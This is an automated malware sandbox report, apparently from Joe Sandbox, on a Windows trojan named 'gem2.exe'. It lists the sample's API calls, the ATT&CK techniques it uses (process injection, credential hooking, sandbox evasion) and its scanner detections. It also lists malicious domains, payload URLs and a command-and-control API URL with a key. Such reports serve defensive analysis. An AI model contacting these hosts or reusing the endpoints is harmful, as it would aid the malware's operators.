Source: C:\Windows\System32\System-f4855f59e0.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 14_2_00007FF6A54FFAC4
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: EnumSystemLocalesW, 14_2_00007FF6A54FF95C
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: EnumSystemLocalesW, 14_2_00007FF6A54FFA2C
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: GetLocaleInfoW, 14_2_00007FF6A54FFD0C
Source: C:\Windows\System32\svchost.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 16_2_00000173CFC03080
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: EnumSystemLocalesW, 17_2_00007FF7D1684210
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW, 17_2_00007FF7D168F600
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: GetLocaleInfoEx, 17_2_00007FF7D166C884
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: GetLocaleInfoW, 17_2_00007FF7D1684750
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: EnumSystemLocalesW, 17_2_00007FF7D168FA2C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 17_2_00007FF7D168FAC4
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: EnumSystemLocalesW, 17_2_00007FF7D168F95C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: GetLocaleInfoW, 17_2_00007FF7D168FD0C
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_00007FF7D168FE64
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: GetLocaleInfoW, 17_2_00007FF7D168FF14
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_00007FF7D1690048
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Code function: 9_2_000001F5A9687E60 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 9_2_000001F5A9687E60
Source: C:\Windows\System32\System-f4855f59e0.exe Code function: 14_2_00007FF6A54FAE28 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 14_2_00007FF6A54FAE28
Source: C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\explorer.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\SysWOW64\explorer.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000173D019B3F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket, 16_2_00000173D019B3F0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000173D0157410 memset,WSAGetLastError,strchr,inet_pton,htons,strtoul,inet_pton,htons,WSAGetLastError,htons,htons,bind,htons,bind,WSAGetLastError, 16_2_00000173D0157410
Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000173D01A1EA6 calloc,calloc,calloc,bind,WSAGetLastError, 16_2_00000173D01A1EA6
Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000173D016EFC0 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons, 16_2_00000173D016EFC0
Source: C:\Windows\System32\svchost.exe Code function: 16_2_00000173D01A2130 calloc,calloc,calloc,bind,WSAGetLastError, 16_2_00000173D01A2130
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 11 Deobfuscate/Decode Files or Information | 2 Credential API Hooking | 2 System Time Discovery | 1 Exploitation of Remote Services | 12 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
Credentials | Domains | Default Accounts | 2 Native API | 11 Scheduled Task/Job | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 2 Credential API Hooking | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 22 Command and Scripting Interpreter | 11 Registry Run Keys / Startup Folder | 722 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 11 Scheduled Task/Job | 1 Services File Permissions Weakness | 11 Scheduled Task/Job | 1 Software Packing | NTDS | 154 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 1 PowerShell | Network Logon Script | 11 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Services File Permissions Weakness | 1 File Deletion | Cached Domain Credentials | 451 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Rootkit | DCSync | 241 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 122 Masquerading | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 2 Modify Registry | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 241 Virtualization/Sandbox Evasion | Network Sniffing | 2 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 722 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Gather Victim Org Information | DNS Server | Compromise Software Supply Chain | Windows Command Shell | Scheduled Task | Scheduled Task | 1 Hidden Files and Directories | Keylogging | Process Discovery | Taint Shared Content | Screen Capture | DNS | Exfiltration Over Physical Medium | Resource Hijacking
Determine Physical Locations | Virtual Private Server | Compromise Hardware Supply Chain | Unix Shell | Systemd Timers | Systemd Timers | 1 Services File Permissions Weakness | GUI Input Capture | Permission Groups Discovery | Replication Through Removable Media | Email Collection | Proxy | Exfiltration over USB | Network Denial of Service
[Behavior graph: ID 1589411, Sample: gem2.exe, Startdate: 12/01/2025, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
gem2.exe | 53% | ReversingLabs | Win64.Trojan.Generic |
gem2.exe | 62% | Virustotal | | Browse
gem2.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe | 100% | Joe Sandbox ML | |
C:\Windows\System32\System-f4855f59e0.exe | 100% | Joe Sandbox ML | |
C:\Windows\SysWOW64\$LMX-f4855f59e0.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft\Temp\Microsoft-f4855f59e0.exe | 53% | ReversingLabs | Win32.Exploit.Generic |
C:\Users\user\AppData\Local\Temp\WinDrive-f4855f59e0.exe | 53% | ReversingLabs | Win32.Exploit.Generic |
C:\Windows\SysWOW64\$LMX-f4855f59e0.exe | 53% | ReversingLabs | Win32.Exploit.Generic |
C:\Windows\System32\System-f4855f59e0.exe | 53% | ReversingLabs | Win32.Exploit.Generic |
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
pastesnap.com | 172.67.198.113 | true | false | | unknown
securetextweb.cc | 104.21.64.1 | true | false | | unknown
wavepassage.cfd | 188.114.97.3 | true | false | | unknown
www.google.com | 142.250.181.228 | true | false | | high
api.ipify.org | 104.26.12.205 | true | false | | high
textbinvault.com | 172.67.176.186 | true | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://pastesnap.com/STB/cGFzdGVzbmFwR.txt | false | Avira URL Cloud: malware | unknown
https://pastesnap.com/STB/cGFzdGVzbmFwM.txt | false | Avira URL Cloud: malware | unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://burningspice.cfd/TxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://wildlify.com/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://inforte.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://wavepassage.cfd/https://pastesnap.com/https://textbinvault.com/NegoExtendersvchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                high
                https://flixmi.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://galaxyglimmer.top/FMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpur32.dllPsvchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                unknown
                https://bluebullet.su/Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000003.1538720334.0000015F98C97000.00000004.00000020.00020000.00000000.sdmp, Microsoft-f4855f59e0.exe, 0000003B.00000002.1544978601.00007FF7D1697000.00000002.00000001.01000000.00000008.sdmp, gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://flixmi.top/=C;LC_TIMEUkkMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://i.ibb.co/R2mnW0B/ico.pngsvchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                  high
                  https://FeelGoodForever.org.ru/IC=CWinDrive-f4855f59e0.exe, 00000026.00000002.1525048817.00000226CC15C000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://wildlify.com/JavaMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://osoft.co_2010-06Xdwm.exe, 0000003D.00000002.2572338533.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000003D.00000000.1542652207.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://tiffanyonlinestore.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://securetextweb.cc/BAT;.CMMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://coolcarforum.com/IxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://flixmi.top/xxSystem-f4855f59e0.exe, 0000000E.00000002.1334661701.000001DD598A9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://www.openssl.org/svchost.exefalse
                    high
                    https://deepseahunter.com.de/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://deepseahunter.com.de/5Microsoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E1C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://SuccessFromWithin.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://LearnToCodeWithUs.su/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://curl.se/docs/hsts.htmlsvchost.exe, svchost.exe, 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpfalse
                      high
                      https://creativecoder.top/sMicrosoft-f4855f59e0.exe, 00000011.00000002.1475065410.0000017D99E32000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://curl.se/docs/alt-svc.html#svchost.exefalse
                        high
                        https://RusTechHub.ru/ath=C:Microsoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://curl.se/svchost.exefalse
                          high
                          https://brettdogecoin.com/tMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://spokoystvieidusha.ru/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://indexinferno.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://curl.se/docs/hsts.html#svchost.exefalse
                            high
                            https://creativecoder.top/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://spokoystvieidusha.ru/E;.WSMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://nuget.org/nuget.exepowershell.exe, 0000001F.00000002.1554825743.000002006B931000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://projectretrac.com/P_PROFMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://wavepassage.cfd/BkzMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://wavepassage.cfd/STB/d2F2ZXBhc3NhZ2U=M.txtsvchost.exe, 00000010.00000002.2555613530.00000173CFB71000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://pastesnap.com/API/cGFzdGVzbmFwGUS.php?api_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpusvchost.exe, 00000010.00000002.2554341140.00000173CE0BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553736925.00000173CE000000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://textbinvault.com/svchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2553827080.00000173CE013000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://pastesnap.com/(Wpowercfg.exe, 00000012.00000002.1449981083.0000029437030000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              https://wavepassage.cfd/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://brettdogecoin.com/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000001F.00000002.1514433357.000002005B8C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpPKU2Usvchost.exe, 00000010.00000002.2553943667.00000173CE027000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://pastesnap.com/API/cGFzdGVzbmFwEP.phpapi_key=ut1bkd3rwa55zy8mt1hc&id=21&settings_type=cpusvchost.exe, 00000010.00000002.2554569786.00000173CE0EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.2555613530.00000173CFB6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://SuccessFromWithin.ru/HkpMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://adorebeautyz.top/SSOR_ARMicrosoft-f4855f59e0.exe, 0000003B.00000002.1544601640.0000015F98C78000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://burningspice.cfd/gem2.exe, Microsoft-f4855f59e0.exe.0.dr, WinDrive-f4855f59e0.exe.17.dr, System-f4855f59e0.exe.0.dr, $LMX-f4855f59e0.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://ipinfo.io/countryNVIDIAAMDntdll.dllRtlGetVersionWindowssvchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                                  high
                                  https://pastesnap.com/STB/cGFzdGVzbmFwM.txt/gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  https://api.ipify.orgwmicsvchost.exe, 00000010.00000002.2547849226.00000173CD257000.00000002.00000400.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000039.00000000.1517534191.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000039.00000002.2549981633.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://pastesnap.com/STB/cGFzdGVzbmFwM.txt5gem2.exe, 00000000.00000003.1420573984.000002351CBC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000001F.00000002.1514433357.000002005BAED000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://go.micropowershell.exe, 0000001F.00000002.1514433357.000002005CA10000.00000004.00000800.00020000.00000000.sdmpfalse
